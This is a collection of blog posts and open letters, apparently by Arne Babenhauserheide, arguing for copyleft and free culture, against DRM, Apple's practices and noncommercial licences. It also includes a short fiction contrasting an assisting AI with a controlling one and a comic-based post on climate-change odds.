Well, they sell their brand while it still holds, but by doing that they burn the ones who brought them where they are today.

Never put effort into a project where you have to trust the creator to not misuse it. Free copyleft licenses are a safeguard for contributors - not only for the coders, but also for those who promote the project.1


  1. That’s one of the reasons why I put the 1w6 roleplaying game completely under the GPL2 and why we develop most of the stuff we do in a decentralized version tracking system. It makes it so easy for people to take over in case I should betray them that the benefit I could get from betrayal is small enough that I hope I can withstand it in the long term. 

  2. 1w6 was freed completely in February 2009 by putting it under GPLv3. Before that it used a custom license, which was free but incompatible with other free works. 

Patent law overrides copyright breaks ownership

Concise and clear.

In patent law, copyright and property there are two pillars: protection and control.

Protection

  • Property: No person shall take that from me.
  • Copyright: No person shall have the same without my permission. A monopoly.
  • Patent Law: No person shall create something similar without my permission. An even stronger monopoly.

Control

  • Property: I decide what happens with this.
  • Copyright: I decide what happens to everything which is the same. Takes another one’s property. → a monopoly¹.
  • Patent Law: I decide what happens to every similar thing. Takes the copyright and property of others. → An even stronger monopoly¹.

In short: Patent law overrides copyright breaks ownership.

¹: Others may have copyrights and property rights which they can only exercise with my permission. So effectively all their rights belong to me. If you want a longer argument on this, please read Intellectual Property Is Theft.

(translation of Patentrecht bricht Urheberrecht bricht Eigentum)

Please accept the signatures from the petition against Article 13

Dear Antonio Tajani,

Please accept the signatures from the petition against article 13.1

In 2014 I contributed to the Public Consultation on the review of the EU copyright rules.2

I publish music online, I write online, I publish Free Software, and I share links to news.

Last month I wrote to my representatives in JURI and asked them to preserve internet freedom. 15 of them nonetheless voted to destroy online freedom. I cannot understand how they could vote for a system which will enforce the widespread establishment of technologies which can form the foundation for censorship that makes Chinese censorship look like a paradise of free speech.

Therefore I now beg you to accept the signatures from the petition against article 13.

Please let the voices of the European citizens be heard. Please help us preserve the Europe we love.

The best of wishes,

Dr. Arne Babenhauserheide


  1. The petition against Article 13, currently with over 654,000 signatures: https://www.change.org/p/european-parliament-stop-the-censorship-machinery-save-the-internet 

  2. My answers to the public consultation on copyright in the EU: http://www.draketo.de/files/2014-03-04-eu-copyright-consultation-document_en-arne_babenhauserheide.pdf 

Shackle-Feats: The poisoned Apple

Making an ability mandatory which forces you to wear shackles takes your Freedom away

This is an email I sent as listener comment to Free as in Freedom.

Hi Bradley, Hi Karen,

I am currently listening to your Steve Jobs show (yes, late, but time is scarce these days).

And I side with Karen (though I use KDE):

Steve Jobs managed to make a user interface which feels very natural. And that is no problem in itself. Apple solved a problem: User interfaces are hard to use for people who don’t have computer experience and who don’t have time to learn how to use computers properly.

But they then used that solution to lure people into traps they set up to get our money and our freedom.

As an analogy: A friend of mine told me that Photoshop gives her Freedom, because she can do things with it which she can’t do with anything else. And she’s right on that: She gets a kind of freedom. But she has to give up other freedoms for that, for example the freedom to do freelancing work without paying 3000€ up front.

To make the problem with that kind of freedom visible, let’s use one more analogy: When I get a flying car with which I can visit the Himalaya without having to get a driver’s license, then I just got the Freedom to actually visit the Himalaya. But sadly that car comes with a rule that I am not allowed to take friends with me, and it does not allow me to drive into cities ruled by left-wing politicians. It costs so much that I can’t afford another car1, so now, if I want to keep the ability to visit the Himalaya, I can never take friends with me, even when I don’t want to go to the Himalaya right now but just to the next shop, and I can’t visit left-wing friends.

That car would give me a kind of Freedom, but it would take away other freedoms I had before I used it. If all people used it, the effects would be horrible, and not just for left-wingers and car owners: You would not be able to get a ride from a neighbor when you needed to get to the doctor fast.

Now imagine what would happen if people found ways to make money with that flying car. They would create a society where you have to give up Freedom if you want to get one of the good jobs.

So creating a new kind of Freedom and coupling it with heavy shackles does not give you more Freedom. It creates a situation where people have a harder time living their lives if they want to keep their basic freedom, because those shackle-feats become mandatory.

Apple kinda invented the shackle-feat “use shiny computers without understanding them”.
They managed to make shackles almost mandatory for parts of society by creating pressure on people to be able to perform the feat, so they have to accept the shackles.

Now we have to recreate that feat without the shackles so people are able to keep up without losing their freedom. We have to do additional work, because society is being shaped by those who made the shackles.

Best wishes,
Arne Babenhauserheide

PS: Steve Jobs managed to create really nice interfaces. He once was a hero to me, and even today there is stuff he did that I admire. But he decided to use his abilities for shackling people.


  1. Or it is so different from other cars that using it for some time forces me to relearn so much that switching to any other car requires a high relearning effort. And for most people, time is as scarce as money. 

The ease of losing the spirit of your project by giving in to short-term convenience

Yesterday I said to my father

» Why does your whole cooperative have to meet for some minor legalese update which does not have an actual effect? Could you not just put into your statutes that the elected leaders can take decisions which don’t affect the spirit of the statutes? «

He answered me

» That’s how dictatorships are started.«

With an Ermächtigungsbescheid - an enabling decree.

I gulped a few times while I realized how easy it is to fall into the pitfalls of convenience - and lose the project in the process.

An answer to tanto in Sone (Freenet - official site)

Steve Jobs, Get Your Head out Of the Sand! - Broken Apple Heart

Dear Steve,

Do you understand that imposing Digital Restrictions Management (DRM) is unethical? That attempting to control our computers and electronic devices to monitor what we do with digital files is wrong and a danger to society?

The problem for DRM proponents is that DRM doesn't work as advertised - and you are helping perpetuate a lie. We know you know this, you've said as much about music and DRM yourself. So why do you persist in touting DRM for video?

What DRM does do is trample my rights and create a situation where, if I were to circumvent a DRM scheme to be in control of my computer, it would be a criminal act - thanks to legislation like the Digital Millennium Copyright Act (DMCA).

So what does DRM do? It monitors what I do. Often, it reports on my activities to a central authority. It locks me in to one vendor of software. It limits what I can do with the stuff I own. Yet Apple takes advantage of DRM to gain exactly this kind of control over its customers, doesn't it?

We don't want DRM! We do want our music and video in formats free from proprietary restrictions. And we want the devices we buy to be under our control.

Do you still have Apple's head stuck in the sand?
I'm writing to suggest you take it out.
- http://defectivebydesign.com

Personal Comment:
I've been a Mac user my whole life. I left you with a broken heart when you used the TPM chip to lock down _developer_ Macs.

Now I'm a GNU/Linux user (KDE), and even though I sometimes think back to Macs, to Shufflepuck (my first addiction), to professional video editing (with my old 66MHz Mac), to the 6 months when I tried every beta of MacOSX even though my 266MHz G3 was far too slow to render it at speed, and to the ease of music production on my Flat-Panel iMac, I won't come back to have my freedom taken.

You're creating great computers. Why do you still have to make them a tool for digital slavery, even though you yourself now acknowledged that this slavery is bad?

The one who acts badly but doesn't know it is a fool.
The one who acts badly and knows it is a criminal, regardless of the laws.

Disappointed wishes with but a glimpse of hope,
Arne Babenhauserheide - Broken Apple Heart (german)

Thank you for your Flattr’s! | Danke für eure Flattr! | Dankon por vian Flattrn!

It’s always a great feeling to see a flattr - Thank you for your support!
You can find new free works for your enjoyment on draketo.de (infrequent and bursty) and 1w6.org (currently weekly but mostly in German).

ArneBab on Flattr

Es ist ein tolles Gefühl, geflattrd zu werden - Danke für eure Unterstützung!
Neue freie Werke von mir findet ihr auf draketo.de (unregelmäßig) und 1w6.org (zur Zeit wöchentlich).

ArneBab auf Flattr

Mi ĝojegas ricevi novan flattrn - Dankon por subteni min!
Nova verkoj estas en draketo.de (ne-regula) kaj 1w6.org (nuntempe ĉiusemajna, sed en la germana).

ArneBab en Flattr

Best wishes,
Liebe Grüße,
Kore,
- Arne alias Drak

PS: This month I got >6€ via Flattr - 80% of my server costs.
_   Diesen Monat habe ich >6€ über Flattr bekommen - 80% der Serverkosten.
_   Tiu monato mi ricevis >6€ de Flattr - 80% de la kostoj por la servilo.

The assisted brain and the chained brain

PDF (to print)

Org (to change)

Who serves whom? Our tools can be our allies or our masters. Do your tools assist or chain?

Lisa

Good morning, Lisa. Your group rescheduled the meeting, so you should get up early today. Do you want a suggestion for rescheduling your workplan to optimize for your biorhythm?

Yes, please. Use the “we had great sex” mode. I’d like fried eggs today, please search for a recipe.

What about “flaming chicken fun”? It’s a favorite of Marta and Dave.

Sounds good. Is there anything urgent today?

Dave asked to upload your plan to moogle sheat again. Shall I send him the public data?

No. Just send him a message “you can have all my data, but I don’t give it to moogle. Just come over at six”

This sounds like an appointment at six. But your schedule today ends at 7. Shall I adapt the schedule?

Yes, adjust it.

“You can have all my data, but I don’t give it to moogle. Just come over at six”, is that correct?

Yes. Send it, please.

Dave

Good morning, Dave. Your group-leader rescheduled the meeting, so you have to get up early today. Shall I reschedule your workplan to maximize your healthcare bonus?

Yes, please. Use the “latenight workout” profile.

I can’t do that, Dave. The “latenight workout” profile requires a workout token, but you met with Lisa who does not have a latenight-account. Your biosignals meet the criteria for “latenight workout”, though. Shall I request individual validation?

No! Just use the usual profile. And search for a recipe with fried eggs.

I can’t do that, Dave. You already bought ice cream yesterday. Ice cream and fried eggs without workout would violate your employee contract. May I suggest orange juice and a salad?

So be it. Is there anything urgent today?

Lisa replied to your request for her plan.

What request?

You asked for her plans, so I sent a request for uploading them. Fapple flagged her answer as aggressive and sleazy. Do you still want to read it?

Not yet. Notify me again after breakfast.

I can’t do that, Dave. Re-notification for aggressive messages makes users unhappy. If you do not read it, it will be deleted in 7 days.

Then say it.

Lisa says “you can have all my data, but I don’t want to give it to moogle. Just come over at six.” I filed a potential appointment at six in your moogle sheat. Do you want to acknowledge it?

Yes, please.

Attachments:
  • assist-or-chain.pdf (92.43 KB)
  • assist-or-chain.org (2.78 KB)

The danger of promoting dead closed clients

I had a strange feeling about people advertising the dead and closed source Gnutella client BearShare, but I only found one of the reasons for that gut feeling today.

Assumptions I use: We want Gnutella to continue to evolve and grow better.

To have Gnutella evolve, the developers of actively developed clients need feedback (even if it is only encouragement).

If people now use a dead client which won't evolve anymore, they don't provide essential feedback to actively developed clients, and it might even happen that some developers waste time trying to hack the dead client to make something work (again) instead of contributing to an active open client.

So every user who uses a dead closed client instead of an active open (and free licensed) client hinders the evolution of Gnutella.

That's not the fault of the user, and it's not per se damaging to the current state of the network (as long as the user shares, he contributes to the available files), but in the long term it hinders Gnutella from becoming better.

With that in mind, promoting a closed dead client directly damages Gnutella.

I know I'm human and as such prone to errors, so if you see anything I overlooked, please tell me about it.

The dynamics of free culture and the danger of noncommercial clauses

NC covered works trick people into investing in a dead end

Free licensing lowers the barrier to entry for creating cultural works, which unlocks a dynamic where people can realize their ideas much more easily - and where culture can actually live, creating memes, adjusting them to new situations and using new approaches with old topics.

But for that to really take off, people have to be able to make a living from their creations - which build on other works. Then we have people who make a living by reshaping culture again and again - instead of the current culture where only a few (rich or funded by rich ones) can afford to reuse old works and all others have to start from scratch again and again.

Sharealike licensing gives those who allow others to reuse their works an edge over those who do not do that: They can access many resources early in their career which allow them to produce high-quality stuff without needing to pay huge amounts up front. And they hone their skills in working with free stuff. So when they become good enough that they can work in art for a living, they are deeply invested in free culture, so they have very good reasons for also licensing their new works under free licenses.

As a real-life example for the dynamic of free licensing, I’ve been working on a free tabletop roleplaying system in my free time for the last 10 years. For 3 or 4 years now it has been licensed under the GPL, so we could use images from Battle for Wesnoth in our books. And 2 years ago, I worked together with another roleplayer to create minimal roleplaying supplements on just one Flyer - where only half the images were from Battle for Wesnoth, because a great artist decided to contribute (All hail Trudy!).

All this would have been possible with NC licensing.

But about 2 months ago a roleplayer from a forum I frequent unveiled his plans to create a German free RPG day, and I realized that our minimal RPG would be a great fit for it - but that I could not afford to print it myself in high enough numbers and good enough quality to reach many people.

So I worked on the design and text to polish them, and when I was happy I started a 4-day fundraiser to finance printing the RPGs. Within just those 4 days I got over 200€ in donations which allowed me to print 2000 RPGs in great quality along with supplements and additional character cards which made every single RPG instantly playable - instead of 1500 RPGs with only one card so people would need 3 RPGs to actually play.

And this would have been plain illegal with NC material.

It is not yet “making a living with free art”, but it is a first step out of the purely hobby creation into a stronger dynamic. One which allows us to bring 2000 physical RPGs to people without going broke - and more importantly: One which started small and can grow organically.

An RPG might not be the best example here, because tabletop RPGs are notoriously bad for generating money. But it is the example I experienced myself.

As an example which might be closer to you: Imagine that you created a movie with free music and other material from free licensed works. Imagine that half of the visuals you use could have already been created - maybe for some other movie. By using free stuff, you could save half the effort for creating the movie.

But if that other stuff had been NC, you would not be allowed to start a fundraiser for getting it to blu-ray quality - at least not without replacing all NC parts, which would have added a high cost to be able to increase your outreach. Likely it would have been a blocking cost. It would have been easier to just create a new project than to polish the one you have to reach more people.

And polish is what allowed me to move the RPG from a barely readable PDF to a work I can look at with pride.

To wrap it up: Free culture - just like free software - allows people to take little steps into creating culture and to move organically from just being a hobby artist towards making a living from their work - and spreading their work to many more people.

NC covered works on the other hand trick people into investing in a dead end, because they can never move beyond being a hobbyist without huge investments which bring no other benefit than recreating what they could use directly when they did not try to make a living. It’s like learning to use Photoshop and then realizing that you aren’t allowed to earn a little extra by improving wedding images without shelling out 3000€ for a Creative Suite license. And that means that you can’t move in small steps from a boring day job to a professional creative life.

(written in reply to a question from Keith, one of the makers of Software Wars, a movie about free software which is trying to fund going to a high-quality blu-ray release at the moment)

(also see Noncommercial doesn’t compose)

The effect of the optional restrictions of the GPLv3

I just thought a bit about the restrictions the GPLv3 allows, and I think I just understood their purpose and effect for the first time (correct me if I'm wrong :) ).

What are the restrictions?

The GPLv3 allows developers (=copyright holders) to add selected restrictions, like forbidding the use of a certain brand name or similar.

The catch with them is that any subsequent developer who adds anything is free to simply strip off the restrictions.

What is their effect?

Now I wondered for a long time what that really gains us. Today I realized that subsequent developers are only free to strip off the restrictions as long as that doesn't violate the license of any part of the program.

That means the GPLv3 restrictions simply have the effect of adding compatibility with other licenses, while keeping the option to strip off any restriction once you replace the part under the other license with a more liberally licensed part.

So this doesn't place any additional burden on packagers, because they already have to check those other licenses for their restrictions. Now the GPLv3 description of the whole package clearly states which additional restrictions are imposed by the parts which are under different but compatible licenses.

While those parts were under separate licenses before (and had to be checked), they can now be improved with GPLv3 code carrying additional restrictions.

And as soon as the GPLv3 code can stand on its own feet, the more restrictively licensed part can be replaced with GPLv3 code, and the restrictions can be removed again, making the work of the packagers easier.

Better still, the GPLv3 clearly shows the sum of all restrictions of the individual (differently but compatibly licensed) parts, so packagers only need to check the GPLv3 license information to see all restrictions in a standardized format (GPLv3 additional restrictions).

Example

Let's assume I find this great piece of software which says "do what you want but don't touch my brand", and I want to build my GPLv3 program on it. Let's call the piece of software "foo". So I just begin coding and use the GPLv3 for my parts (simply a copyright message in my code files). For the whole package I add license information ("license.txt" or "COPYING" or similar) which gives the information:

  "This program is licensed under the GPLv3 
  with the additional restriction that the brand 
  'foo' may not be used for derived products. 
  The additional restriction is imposed by the package foo.

  (plus license mumbo jumbo you can find at and copy 
  from http://gnu.org/licenses/gpl.html)"

Now someone else takes my program and improves it. But he also uses the package "blah" which also says that its brand must not be used. Now the combined license would be:

  "This program is licensed under the GPLv3 
  with the additional restriction that the brand 
  'foo' and the brand 'blah' may not be used for 
  derived products. 
  The additional restriction for brand 'foo' is imposed by the package foo.
  The additional restriction for brand 'blah' is imposed by the package blah. 

  (plus license mumbo jumbo you can find at and copy 
  from http://gnu.org/licenses/gpl.html)"

So now a group of free software activists takes offense at the restrictions. They don't want anyone to be restricted by copyright from using a brand. One reason could be that the brand protection was voided by some trademark action.

Now they can't just say "that brand isn't protected anymore", since the protection was reinforced by copyright law.

But they can just replace the parts under the more restrictive licenses with honest GPLv3 licensed parts - either by writing them or by finding a drop-in replacement. Now let's suppose they write the packages "bar" and "baz" which implement the functionality of "foo" and "blah". They now no longer use any parts under licenses which require additional restrictions, so they are free to remove them. As they release their package, the license information might read as follows:

  "This program is licensed under the GPLv3.  

  (plus license mumbo jumbo you can find at and copy 
  from http://gnu.org/licenses/gpl.html)"

If they are nice (and we assume they are), their changelog will also contain a line saying something like "replaced 'foo' and 'blah', which allowed us to remove the additional license restrictions against using the brands 'foo' and 'blah'."
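
To make the composition logic explicit, here is a small toy model - purely my own illustration with made-up names, nothing taken from the actual license texts. Each part of a combined work carries a set of additional restrictions, the work as a whole carries the union of those sets, and a restriction can be dropped as soon as no remaining part requires it:

  def combined_restrictions(parts):
      """Return the union of the additional restrictions required by all parts."""
      restrictions = set()
      for required in parts.values():
          restrictions |= required
      return restrictions

  # The combined work from the example: my GPLv3 code plus "foo" and "blah".
  work = {
      "my-code": set(),
      "foo": {"the brand 'foo' may not be used for derived products"},
      "blah": {"the brand 'blah' may not be used for derived products"},
  }
  print(combined_restrictions(work))  # both brand restrictions apply

  # Replace "foo" and "blah" with the freshly written "bar" and "baz" ...
  del work["foo"], work["blah"]
  work["bar"] = set()
  work["baz"] = set()
  print(combined_restrictions(work))  # set() - no additional restrictions remain

The sketch only shows that the visible restrictions always mirror the parts which are still present - which is exactly what makes it safe to strip a restriction once the part that required it is gone.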

Final remark

As you see (and if I understand it correctly), the additional restrictions can be a great tool for freeing software from restrictions, because they allow you to combine GPLv3 code with somewhat restrictively licensed code and get rid of the restrictions later by replacing the more restrictively licensed parts.

And since the only allowed additional restrictions are those which don't harm the four freedoms of free software, you can still make sure that you use ethically sound software by simply checking whether it is GPL licensed.

So kudos to the designers of the GPLv3. They did such a great job that it took me two years to realize one of the many powerful tools they gave us with the GPLv3 - and I did take part in the public discussion of the GPLv3 since draft 1 (but I never watched a GPLv3 speech...).

Also, since the GPLv3 allows combination with AGPLv3 software (which adds the restriction that the source code must also be supplied when the software is used over a network), it gives us a clear path into a future where people might use more and more software "as a service", so it doesn't get executed on their local machine and the normal GPL alone isn't enough to protect our freedom.

The generation of cultural freedom

New version of this article: draketo.de/politik/generation-of-cultural-freedom.html

I am part of a generation that experienced true cultural freedom—and experienced this freedom being destroyed.

We had access to the largest public library which ever existed and saw it burned down for lust for control.

I saw Napster burn, I saw Gnutella burn, I saw eDonkey burn, I saw torrent sites burn, I saw one-click-hosters burn, and now I see Youtube burn with blocked and deleted videos - even those from the artists themselves.

Not even for greed or gain, because enough studies showed that we did no damage and that we actually paid more for cultural goods than those who did not enjoy that freedom.1 They fought for control over us.

And the loss of cultural freedom is only the precursor for the loss of personal freedom, as many new censorship laws show.

Feel free to share this text under cc by: Creative Commons License


  1. Burning down filesharing services has nothing to do with earning more money. In 2007 the limited data available to social scientists was still too sparse to allow distinguishing the effect of filesharing from zero, as published in the Journal of Political Economy (german article). In 2012 a study from the Music Industry showed that users of filesharing networks pay 50% more for media (german article) than those who do not use filesharing (and killing Megaupload reduced the sales!). So if this were about money, the media would cheer for filesharing networks and simply do media campaigns which say “If you enjoy music, pay the artists, so they can create more of the works you love!”. The real reason why they fight filesharing is that the internet breaks the dominance of the ruling class over information (german article) and allows artists and fans to come together without paying bridge toll (the final german article I reference here ☺). Killing our most efficient ways to share culture has nothing to do with financing artists, but everything with regaining control of the information channels. Filesharing networks are an uncontrolled distribution and communication channel. And those who want control over us will not stop just because we show them that their actions harm artists. The only way to stop them is to make it so expensive to control us - in terms of money and in terms of political influence - that pushing their agenda against free communication would put their power in other areas of society at a severe risk. 

Attachments:
  • generation-of-cultural-freedom.png (63.64 KB)

The internet means unlimited copying. What we make of it depends on us

Comment to “is the web too good for us” on a BBC blog:

But the web was not really free in the beginning. While its structure was open for everyone and websites bloomed and blossomed by copying code and design from others, the content of sites stayed closed by copyright.

There were many thoughts of freedom in the original web, but the structure gave more freedom than the law, and the easy copying inside the new medium still didn't reach the slow legal body of our offline communities.

Online, though, laws were first ignored, then bent and finally used to create new rules within the laws themselves.

Thus came free software, a quarter of a century ago, even before the web spread its basic property of cheap infinite copying into mainstream society, when coders realized that traditional copyright didn't fit their way of cooperating and curtailed their creative work. Free Software spread and became the base and foundation of today's internet infrastructure, with Apache webservers on GNU/Linux computers serving its content - unbeknownst to most of its users.

And from the same spring came Creative Commons, about 20 years later, used by artists who realize that the traditional rules do more harm than good to them.

The new digital world began even before the internet, by making the copy an integral part of merely looking at data, but it grew with the internet, which pushed the effects of this new technology right into the face of our societies. And so the digital world, which currently finds its most well known expression in the internet, is an ownership breaker by design, and many battles were fought over this most beloved and most hated feature.

You can no longer control what people do with things you put on the internet, as long as you allow them to see them. Once they have seen them, even if only for a moment, they can have a copy. You can only use social rules to keep them from passing on their copies, or take over their computers.

Even while I write this comment, I don't do it on your website. I write it in a local copy of your website which is stored by my browser, and I could go on writing it long after your website disappeared, as long as my computer kept the copy.

The only way around this is to go back to the analog age, where showing doesn't equal handing out a copy, or to allow some entity complete control over our computers to enforce certain rules - and over our lives which more and more move towards the digital space.

To come back to the question: The web is not too good for us. It provides more openness than many people want to provide, and far more than the law offers, but this openness gave rise to movements which shaped the openness into freedom by establishing the rule that whatever is freed must never be shackled again. They took the single inherent freedom of copying and added the freedoms of changing and using. From that source came free software which drives the internet and the Wikipedia which provides the world's largest publicly accessible knowledge base. Creative Commons walks a similar path by always allowing the copying of the creative works, but it allows for much more control by the creator.

The internet removes the restriction on copying which is inherent in our analog world. Our societies and legal systems, though, will take time to adapt. If we're lucky they'll accept the internet as freedom and adapt as free software and the Wikipedia did. If we're unlucky they'll try to limit the openness, either through technology or through laws. They could turn that openness from an openness for people into an openness of people, because copying doesn't only go one direction. They can just as well copy a record of every move we make and use this to create an almost perfect surveillance system with all its implications for freedom.

And they wouldn't necessarily need to establish rules based on punishment, which we currently have as laws. They could just as well use digital shackles, which don't just disallow some action, but make it impossible. The rules could be like a car which makes it impossible for me to drive faster than the law allows while my child bleeds to death on the back seat.

So the web is neither good nor bad. It's simply a world which operates on slightly different rules than the physical world, and we're still in the process of learning the implications, promises and dangers of that tiny change of rules.

The princess is the ultimate representation of social and hierarchical power

Knight, do my bidding.

A girl told my son “I’m a princess, you’re a knight, fetch me a glass of water!”. It was then that I realized that a princess typically isn’t someone to save. I was so proud of my son when he said “no”, because I suddenly realized how hard it is to escape the shackles of that special story.

A princess is the one person in the country who reigns supreme in both hierarchy and social standing. People in stories might hate the king, but the princess is beloved by most. Remember Princess Diana: In life she was a role model, and her death moved most people in Europe. No one in his or her right mind would admit to killing her, not even among close friends. This is different with a king: You can kill a king and still keep your friends. But a princess is out of reach.

The princess might be seen as tragic -- having to sacrifice love for the good of the kingdom -- but she is still out of reach to any man. And she can destroy any person with a mere accusation. The one who insults a princess is condemned both by the power of the state and by society.

The only capability a princess in stories lacks is physical force, and the only way a man outside royalty can be more to the princess than a servant is saving her from some horrible fate. Since she reigns supreme in everything but physical force, this fate will have to be fought with physical strength.

The power she uses is indirect: The princess in stories did not create her power, she inherited it. But this does not mean that it is not real: If the king is not depicted as evil, then the guards are loyal to the princess, and this loyalty is real power.

This is why it felt strange to me when people celebrated stories in which the princess also wielded physical power as an inversion of the archetype of a princess needing to be saved. Making her also physically strong made her the most powerful person on every level. But it did not invert power. Instead it just increased the concentration of power.

An inversion of power would have been to tell the story of a cleaning maid who trained in secret to become a guard and who finally saved and married the fair and friendly and handsome and harmless prince. The end result would have been the same: A queen who wields physical, social and hierarchical force alike. But the path would have been one of a strong woman who makes her own way.

Please sit back for a moment and imagine that story. Then come back in 5 minutes. If you have a clock at hand, please check the time, then take 5 minutes to let your imagination flow.

… 5 minutes later …

How does it feel to see the woman at the bottom train to fight her way up? How does it differ from the princess who gets trained by her personal guard?

The archetype of the royal prince in shining armor, fair and strong and beloved by everyone, has mostly disappeared. We rarely have these stories nowadays, because they are much less interesting than stories about people who have weaknesses, and because so many real royal princes hugely underperformed compared to the archetype. And writers in the past century worked a lot to dispel hierarchy and the story of the good and noble king with the inherited right to rule. Nowadays we ask why someone should have the right to rule others.

If these stories which glorify hierarchy come back with the martial arts princess, that does create a female version of the archetype of the royal prince saving the world, but it does not reverse the archetype of the knight saving the princess. Instead it uses a weakened version of equality as excuse to bring back justifications for hierarchy.

However this does not mean you should not tell stories of martial arts princesses, if you like them.

Those stories might actually be pretty cool, and might capture the imagination of a whole generation, as Street Fighter did with Chun Li (though she wasn’t a princess), or Starcraft did with Kerrigan1, or Alien did with Ripley. If you have a millionaire with super-human strength and extreme intellect saving people from the shadows (yepp, Batman), there’s no reason not to have a princess who takes up the good fight.

Also what I call the martial arts princess here is not the princess who rebels against her upbringing and is ready to give up her power for freedom. That is a genuine story of liberation. The martial arts princess is about just adding physical power to social and hierarchical power (as most magical girl princess anime stories do2).

But stories of martial arts princesses won’t get my cheers for being on the forefront of equality. They might get my cheers for being great stories, but my cheers for equality are reserved for stories of women who make their own paths without strengthening the chains of existing hierarchy.


  1. Kerrigan from Starcraft 1 could be described as adopted renegade warrior princess, later betrayed by her king, and finally ruler of the swarm as the queen of blades thanks to her own sheer force of will, strategic brilliance, and ruthlessness. 

  2. I like anime a lot, but that does not get me to ignore problems that are common in anime. 

The translation of NSA is Stasi

Just a short note, in case you have been surprised by the NSA acting like the Stasi in the former DDR (German Democratic Republic).

Here’s the translation of NSA:

  • N: National = Staatlich
  • S: Security = Sicherheit
  • A: Agency = Ministerium

Let’s put that together:

NSA = Staatliches Sicherheitsministerium
(in more regular German: Ministerium für Staatssicherheit)

Well, that’s long. Shorten it to Staatssicherheit. Still too long for casual discussions. So shorten it once more: Stasi.

NSA = Stasi

Do you still wonder why the NSA acts like the Stasi?

The “Apple helps free software” myth

→ Comment to “apple supports a number of opensource projects. Webkit and CUPS come to mind”.

Apple supports a number of copyleft projects, because they have to. They chose to profit from the work other people released as copyleft, and so they are obliged to release their improvements.

Webkit

Webkit is an especially good example of this: Apple took the khtml code from KDE, worked with it for half a year and only released binaries (which is a breach of the license of khtml) until they finally released their code in one big code-drop which the khtml folks had no chance of integrating cleanly.

That way Apple broke away from the community and created their own fork in a way which made sure that the KDE folks could not profit from Apple’s work without throwing out their own structure.

They still had to adhere to the license, though, which enabled others to use Webkit - and essentially created a revolution in web browser development, because Apple added all the polish needed for a modern browser. If you look at the way they treated the khtml developers, though, do you really think they would have released any code on that critical part of their OS if they had not been forced to do so by the strong copyleft used by KDE?

Cups

CUPS, the other example of Apple-maintained free software, … is GPL licensed, too. No surprise there: Why else should Apple give their work to others, if not because the license forces them to?

And even there they try to get out by adding a GPL-exception to the parts they write, which allows using those parts without giving out source code. But “This exception is only available for Apple OS-Developed Software and does not apply to software that is distributed for use on other operating systems”.

How much do you think they will still maintain once they have managed to get that header into all files - and no longer fear a free fork? (also note that shortly after Apple started maintaining cups, it broke on my GNU/Linux system - „Ein Schelm, wer Böses dabei denkt“, “shame on whoever thinks ill of it”, as we say in Germany)

Darwin

Just look at what they did with Darwin. They took all the code from FreeBSD. Then they kept the uninteresting part free as long as needed to earn a good name and get people to work in their spare time on porting it to Intel architectures - work which greatly benefitted Apple, because they could then get away from PPC and no longer depend on IBM. The interesting part, however, the graphical interface, was completely locked up from the beginning.

See why OpenDarwin stopped: “Availability of sources, interaction with Apple representatives, difficulty building and tracking sources, and a lack of interest from the community“ — OpenDarwin Shutting Down

4 of 5 reasons for stopping the free alternative directly come from Apple…

LLVM

Since LLVM was brought up in a comment, here’s the relevant part of my answer: For LLVM they have a clear goal to reach: Getting rid of a dependency on GCC for which they will have to release their adaptions indefinitely, while they can close down their new code for LLVM at any point.

I as potential user of their code cannot be sure that their future work on it will stay free (which is why I do not use their code - and different from Xorg, Apple has a track record of closing down their devices).

Epilogue

Should I complain about that? Actually no. After all, they are allowed to do it by the license. They just do what they can to maximize their monetary gain.

And actually I prefer seeing a big company use copyleft programs to improve its products, because that means that others will be able to achieve at least that part with free software.

If I should complain about anybody, then about all the people who praise Apple for doing what they are forced to do to get the work of others for free - and about shortsighted developers, who use non-copyleft licenses, which allow folks like Apple to save lots of money while locking out others and creating “the computer as a jail made cool”, as Richard M. Stallman put it quite nicely — I call that shackle-feats.

Since my interpretation was called worst-case in a comment, here’s the relevant part of my answer: I don’t really see anything, where Apple contributed something to be good. They did what they needed to avoid being sued, to avoid getting a GPLv3 fork which they would not be able to lock down, to get work for free without having to commit to anything and to get rid of GCC which they cannot lock down.

What irks me, though, is that there are quite a few people who call Apple good because of that. No, Apple is not good. Apple is a company and you should never trust a company. The only way to make Apple act ethically (“good”) would be to get their customers to base their buying decision on ethics. You can see this article as part of that effort: Dismantling illusionary ethics to make it easier for people to spot real ethical behavior.

Two visions of our future

storm shelter or forestry: Caption at the top: Save Civilization: Stop GHG emissions, then roll a die. Then two panels: - result: 1, 2, 3: An image of a flooded storm shelter with caption we’re late. Build storm shelter and flood walls. - result: 4, 5, 6: An image of a forest with caption There is still time. Plant lots of trees.
    by Mike Perry (http://nodicemike.com)

We still have to stop CO₂ emissions and plant trees to prevent even worse catastrophes, but since 2022 the most likely future is that there will be catastrophes even if we stop CO₂ emissions right now. This is what climate scientists in the past 30 years hoped to prevent. We failed. Now we must fight to avoid even worse outcomes. We are making progress at that, but we must speed up.

Update 2022: As by the WMO, we’re now at 50% within the next 5 years: “⚀ or ⚁ or ⚂” (1 or 2 or 3). “The odds of at least one of the next 5 years temporarily reaching the Paris Agreement threshold of 1.5°C have increased to 50:50. In 2015 the chance was zero.”

Update (2021-09): According to IPCC AR6, we’re now at 50%.

Update 2018-09-03: As by Aengenheyster et al. 2018, we’re now at “⚀ or ⚁” (1 or 2): »However, reaching the 1.5 K target appears unlikely as MM would be required to start in 2018 for a probability of 67%.« MM means getting a 2% increase of the share of renewables every year.

I don’t know what we rolled, but I sure hope it’s not a 1.1

For the robust science behind the green future, see Hansen et al. 2017:

Young people's burden: requirement of negative CO₂ emissions.

If we stop emissions almost completely by 20252 and get lucky (so we only get the moderate part of the likely global warming due to the greenhouse effect), then we can prevent most long-term problems by innovative agriculture and forestry.

This is a time for all of humanity to band together and protect our home world. Even if you would not be willing to bet on not having rolled a 1, please help to cut emissions now. Use a bicycle if you can. Use public transport. If you need a car, choose it by its CO₂ emissions. Buy power generated from renewable sources. Eat less meat (at most 300g per week). Vote for those who fight to mitigate global warming and keep climate change manageable.

For the robust science behind the bleak future, see Hansen et al. 2016:1

Ice melt, sea level rise and superstorms.

If we don’t get much more active, I’ll soon have to update the bleak future to “⚀ or ⚁” (1 or 2).34

It’s crazy to just imagine the risk taken in the Paris agreement 2015 by targeting up to 1.5°C warming, and that was already the best plausible outcome.

Strip drawn on commission by the awesome Mike Perry (http://nodicemike.com/). Licensed cc by. The full source is attached.

There is a german version: Zusammen für Zivilisation.


